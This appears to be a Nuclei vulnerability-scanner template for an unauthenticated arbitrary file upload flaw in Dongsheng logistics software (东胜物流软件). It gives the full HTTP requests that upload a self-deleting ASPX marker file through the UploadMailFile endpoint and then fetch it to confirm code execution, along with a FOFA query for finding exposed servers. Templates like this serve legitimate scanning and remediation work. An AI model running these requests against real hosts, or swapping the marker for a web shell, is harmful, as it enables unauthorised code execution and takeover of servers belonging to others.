http:
    - extractors:
        - group: 1
          internal: true
          name: uploadfile
          part: body
          regex:
            - ([a-zA-Z0-9]+\.aspx)
          type: regex
      raw:
        - |
          POST /CommMng/Print/UploadMailFile HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj

          ------WebKitFormBoundaryFfJZ4PlAZBixjELj
          Content-Disposition: form-data; name="LoadFile"; filename="{{username}}.aspx"
          Content-Type: application/octet-stream

          <%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
          ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - "GET /UploadFiles/MailFile/{{uploadfile}} HTTP/1.1 \nHost: {{Hostname}}\n"
id: dongshengwuliu-UploadMailFile-File-upload
info:
    author: Superhero
    description: |-
        fofa: app="东胜物流软件-物流软件"
        东胜物流软件 UploadMailFile 接口存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 东胜物流软件 UploadMailFile 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/Q1exlFUSDH3rrzdMh2NO4g
    severity: high
    tags:
        - 东胜物流软件
variables:
    username: '{{to_lower(rand_base(6))}}'
